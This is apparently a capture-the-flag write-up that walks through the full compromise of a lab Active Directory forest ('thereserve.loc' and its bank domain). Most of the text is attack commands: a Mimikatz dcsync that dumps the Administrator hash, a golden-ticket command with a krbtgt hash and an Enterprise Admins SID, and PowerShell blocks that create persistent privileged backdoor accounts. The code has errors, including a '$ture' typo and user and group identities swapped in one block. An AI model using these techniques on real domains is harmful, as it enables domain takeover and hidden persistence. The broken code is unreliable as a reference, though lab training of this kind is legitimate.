Full Compromise of BANK Domain

Summary

Using our golden ticket, we will open a PowerShell session with Administrator privileges with PsExec to create a user with full privileges on the rootdc.

This grants access to bankdc, where we create a user in the bank domain and place proof of compromise on all available machines.

Recon

With PsExec we open a PowerShell session with Administrator privileges.

With the golden ticket in place, we can now retrieve the hash, using the SID we obtained in the previous section.

lsadump::dcsync /dc:rootdc.thereserve.loc /domain:thereserve.loc /user:S-1-5-21-1255581842-1300659601-3764024703-500

And we have the Administrator hash: 5e3d8d541c6d3891c20a503464869fa9

Breaching BANK Domain (10.200.XXX.101)

We craft another golden ticket as krbtgt.

kerberos::golden /user:krbtgt /domain:corp.thereserve.loc /sid:S-1-5-21-170228521-1485475711-3199862024-1009 /service:krbtgt /rc4:0c757a3445acb94a654554f3ac529ede /sids:S-1-5-21-1255581842-1300659601-3764024703-519 /ptt

To maintain persistence and enable login without generating new tickets, we can create a new user with the PowerShell session with Administrator privileges and add it to the Enterprise Admins group with the following PowerShell commands:

$pwd =ConvertTo-SecureString "<password>" -AsPlainText -Force
New-ADUser -Name <username> -AccountPassword $pwd -PasswordNeverExpires $ture -Enabled $true
$User = Get-ADUser -Identity "<username>" -Server "rootdc.thereserve.loc"
$Group = Get-ADGroup -Identity "Enterprise Admin" -Server "rootdc.thereserve.loc"
Add-ADGroupMember -Identity $Group -Members $User -Server "rootdc.thereserve.loc"

Now that we are Enterprise Admins, the compromise of the other child domain should be easy. We can start by connecting through RDP into the BANKDC from ROOTDC, with our newly created user

We can use the same commands to create a user at CORPDC as a Domain Admin, enabling us to log in with accounts in both domains:

$pwd =ConvertTo-SecureString "<password>" -AsPlainText -Force
New-ADUser -Name <username> -AccountPassword $pwd -PasswordNeverExpires $ture -Enabled $true
$User = Get-ADUser -Identity "<username>" -Server "corpdc.bank.thereserve.loc"
$Group = Get-ADGroup -Identity "Domain Admin" -Server "corpdc.bank.thereserve.loc"
Add-ADGroupMember -Identity $Group -Members $User -Server "corpdc.bank.thereserve.loc"

Now, we can repeat the process of creating a user in the BANK domain, as a Domain Admin, using the previous code:

$pwd =ConvertTo-SecureString "<password>" -AsPlainText -Force
New-ADUser -Name <username> -AccountPassword $pwd -PasswordNeverExpires $ture -Enabled $true
$User = Get-ADUser -Identity "Domain Admins" -Server "bankdc.bank.thereserve.loc"
$Group = Get-ADGroup -Identity "<username>" -Server "bankdc.bank.thereserve.loc"
Add-ADGroupMember -Identity $Group -Members $User -Server "bankdc.bank.thereserve.loc"

Now, using the newly created Domain Admin account we attempt to place our proof of compromise on all target machines using the runas command. This way, we can avoid using RDP for each individual machine, streamlining the process significantly.

To avoid repeatedly entering a password when using runas, we can open a command prompt as the bank\<Username> user and keep the terminal open using the /k switch. This way, we can execute all necessary commands from a single session to place our proofs.

Flags 9 -14

NOTE: We are now able to obtain the following flags by following the instructions on the e-citizen platform:

• Flag 9: Foothold on Bank Division Tier 2 Infrastructure

• Flag 10: Administrative access to Bank Division Tier 2 Infrastructure

• Flag 11: Foothold on Bank Division Tier 1 Infrastructure

• Flag 12: Administrative access to Bank Division Tier 1 Infrastructure

• Flag 13: Foothold on Bank Division Tier 0 Infrastructure

• Flag 14: Administrative access to Bank Division Tier 0 Infrastructure

We can also do the above by using the network path as it is easier for authentication and accessing the file system in File Explorer.